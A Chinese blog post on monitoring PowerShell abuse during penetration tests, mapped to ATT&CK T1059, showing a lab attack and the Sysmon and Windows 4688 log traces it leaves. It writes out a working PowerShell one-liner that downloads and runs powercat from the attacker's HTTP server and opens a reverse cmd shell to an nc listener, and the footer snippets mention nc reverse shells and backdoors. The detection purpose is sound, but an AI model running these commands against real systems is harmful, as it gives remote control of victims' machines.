监控渗透测试中powershell白名单利用行为

最新推荐文章于 2024-04-19 13:33:04 发布
最新推荐文章于 2024-04-19 13:33:04 发布
阅读量698 收藏 1
点赞数
分类专栏: 白名单利用 ATT&CK 日志分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36334464/article/details/106008009
版权

简介

您可以使用PowerShell.exe从另一个工具(例如Cmd.exe)的命令行启动PowerShell会话,也可以在PowerShell命令行启动新会话。从此处阅读Microsoft Windows官方网站上的更多信息。

补充说明:在高版本powershell(V5以上含V5)中,可以通过配置策略,对进程命令行参数进行记录,具体策略可参考powershell事件。同样也可以在不同版本操作系统中部署sysmon,通过sysmon日志进行监控。

基础日志

windows 安全日志/SYSMON日志(需要自行安装)

测试复现

环境准备

攻击机:Kali2019

靶机:win7(sysmon)

攻击分析

生成payload

下载我们本次测试中要用到的powercat,下载地址:https://github.com/besimorhino/powercat

开启小型http服务

powercat目录下执行以下命令:

root@12306Br0:~# python2 -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
执行监听
nc -lvp 1234
靶机执行payload
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.126.146/powercat.ps1');powercat -c 192.168.126.146 -p 1234 -e cmd"
反弹shell
root@12306Br0:/# nc -lvp 1234
listening on [any] 1234 ...
192.168.126.149: inverse host lookup failed: Unknown host
connect to [192.168.126.146] from (UNKNOWN) [192.168.126.149] 49339
Microsoft Windows [�汾 6.1.7601]
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����

测试留痕

#sysmon日志
EventID: 1
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 6.1.7600.16385 (win7_rtm.090713-1255)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: powershell  -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.126.146/powercat.ps1');powercat -c 192.168.126.146 -p 1234 -e cmd"

#win7安全日志
EventID: 4688
进程信息:
新进程 ID: 0x330
新进程名: C:\Windows\System32\cmd.exe
令牌提升类型: TokenElevationTypeLimited (3)

EventID: 4688
进程信息:
新进程 ID: 0xa44
新进程名: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

#Powershell V5(含V5以上)配置审核策略,可以达到记录命令行参数的效果。通过命令行参数进行监控分析。当然也可以采用配置windows server 2008(不含2008)以上审核进程创建策略,同样也可以对命令行参数进行记录,最后达到监控效果。

检测规则/思路

无具体检测规则,可根据进程创建事件4688/1(进程名称、命令行)进行监控。本监控方法需要自行安装配置审核策略/sysmon。

参考推荐

MITRE-ATT&CK-T1059:https://attack.mitre.org/techniques/T1059/

12306Br0
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试基础知识
m0_71309464的博客
10-31 179
页面转码URL方式 http://127.0.0.1/codeset/day03/rcefunc.php?页面转码URL方式 http://127.0.0.1/codeset/day03/rcefunc.php?页面转码URL方式 http://127.0.0.1/codeset/day03/rcefunc.php?1-)测试靶场pikachu的测试远程命令执行“exec“ping”需要用的URL进行匹配 除了匹配到的URL,其余的都要拒绝。(防止文件curl的漏洞)
Linux Kali 使用笔记 【二】Netcat - TCP/IP 连接的瑞士军刀
weixin_46703850的博客
03-25 1828
【二】Netcat - TCP/IP 连接的瑞士军刀1.netstat -antp 查看开放的端口2. 打开端口 nc -lvp3. 连接端口 nc -v [IP]4.shell<1>.开放式shell<2>.反弹式shell5.使用cron进行定任务 介绍:记录学习笔记 1.netstat -antp 查看开放的端口 2. 打开端口 nc -lvp 打开端口并监听接收的信息 ┌──(root????kali)-[/home/kali] └─# nc -lvp 8080 liste
::ZheTian / 遮天 强大的Anti-Virus对抗工具
╲ゞ紅桃K
09-29 1270
::ZheTian / 遮天 强大的Anti-Virus对抗工具。
Windows,应用添加到防火墙白名单里面批处理命令
最新发布
weixin_43542114的博客
04-19 359
在 Windows ,你可以使用 PowerShell 脚本或者批处理命令来将程序添加到防火墙白名单。将上述代码保存为 .bat 文件,然后以管理员身份运行该批处理文件。这将在防火墙添加一个新规则,允许指定程序的入站连接。将上述代码保存为 .ps1 文件,然后运行 PowerShell 窗口,使用管理员权限运行该脚本。如果你更倾向于使用批处理命令,你可以使用。
docker host net mtu (by quqi99)
技术并艺术着
03-06 1542
作者:张华 发表于:2021-03-06 版权声明:可以任意转载,转载请务必以超链接形式标明文章原始出处和作者信息及本版权声明 在一个gre虚机上创建一个docker container,显然网络不通是由mtu造成的。但是如果host=net创建的网络为什么也是不行呢? sudo docker run --rm --net=host --privileged --name=nginx -v /sys/fs/cgroup:/sys/fs/cgroup -d -ti nginx sudo docker exe
靶机渗透练习31-Funbox10-Under Construction
hirak0的博客
04-18 1001
靶机描述 靶机地址:https://www.vulnhub.com/entry/funbox-under-construction,715/ Description As always, it’s a very easy box for beginners. This works better on VitualBox rather than VMware 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:192.168.9.49 注:靶机与Kali的IP地
如何利用PowerShell监控Win-Server性能详解
01-10
本文就给大家介绍了关于利用PowerShell监控Win-Server性能的相关内容,下面话不多说了,来一起看看详细的介绍吧 一、关于PowerShell 1、什么是PowerShell  表层面的翻译:强大的Shell。  强大?  如果是从知名度...
渗透Powershell简单使用
03-28
powershell的简单使用。 一些脚本的开发 ,主要用于渗透
POWERSHELL_内网渗透实例.pdf
08-07
目录 1.POWERSHELL简介 2.POWERSPLOIT 3.内网渗透实例
监控局域网内 共享打印机powershell脚本
08-07
监控局域网内:共享打印机 获取打印记录、打印人员、打印文件等详细信息。导出为excel表格
Powershell使用小技巧-需持续更新
sdyu_peter的博客
06-04 2975
使用$Alias:dir查询dir的cmdlet,其他命令类似:PS C:\Users\Administrator\Desktop&gt; $Alias:dir Get-ChildItem PS C:\Users\Administrator\Desktop&gt; $Alias:ls Get-ChildItem PS C:\Users\Administrator\Desktop&gt; $Alia...
Windows事件响应指南(下)
weixin_43200882的博客
10-26 1800
在我们Blue Team,针对Windows日志分析的场景占绝大多数,Windows 事件日志记录提供了源、用户名、计算机、事件类型和级别等详细信息,并显示应用程序和系统消息的日志,包括错误、信息消息和警告。增强对在您的环境的系统上运行的进程的可见性的另一个选择是实施 Sysmon,这是 Sysinternals 的一个免费实用程序,现在是 Microsoft 的一部分。Windows WFP 的事件描述是十分详细的,包括有关本地和远程 IP 和端口号以及所涉及的进程 ID 和进程名称的信息。
linux输入nc命令后unknown,Linux nc命令_Linux 教程_服务器相关_教程_教程_JSON在线解析及格式化验证 - JSON.cn...
weixin_39790510的博客
05-05 1995
Linux nc命令用于设置路由器。执行本指令可设置路由器的相关参数。语法nc [-hlnruz][-g][-G][-i][-o][-p][-s][-v...][-w][主机名称][通信端口...]参数说明:-g 设置路由器跃程通信网关,最多可设置8个。-G 设置来源路由指向器,其数值为4的倍数。-h 在线帮助。-i 设置间间隔,以便传送信息及扫描通信端口。-l 使用监听模式...
linux命令inetd,Linux后门的两种姿势(suid shell与inetd后门)
weixin_33736210的博客
04-29 776
前提:你现在已经是root用户, 想留一个后门以便日后再一次爆菊花。系统环境:Defaultdawg:~# uname -aLinux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux12dawg:~# uname -aLinuxdawg2.4.20-1-386#3 Sat Mar 22 12:11:40 EST 20...
用nc反弹shell真有意思哈哈
热门推荐
公众号shadow sock7
06-17 1万+
先在bee(192.168.170.130)上面bee@bee-box:/tmp$ nc -vlp 4444 -e /bin/bash listening on [any] 4444 ... 192.168.170.1: inverse host lookup failed: Unknown host connect to [192.168.170.130] from (UNKNOWN) [192.
如何绕过应用白名单和受限的 PowerShell
weixin_34104341的博客
09-25 293
本文讲的是如何绕过应用白名单和受限的 PowerShell?, 最近几年,关于如何绕过应用程序白名单的研究非常火热,Casey Smith(@subtee)和Matt Graeber(@mattifestation)都有过这方面的研究,他们最新研究成果就是“应用程序白名单必须被锁定,以避免受信任的应用程序被攻击者实施代码注入”,不过他们的研究成果只是...
检测和缓解PowerShell攻击的方法
12306小哥
09-27 2174
声明:本文档由12306Bro个人业余间翻译,个人行为与公司无任何关系!译文来源INSIDER THREAT SECURITY BLOG博客站相关文档。如您对翻译文档内容有异议,请将原文文档为主要参考,原文版权由博客站及其相关成员持有并保留。翻译文章禁止用于任何商业用途,仅供交流与学习。 PowerShell已经发展成为针对windows系统攻击的主要方式之一,是攻击者使用本机工具攻击的一种...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值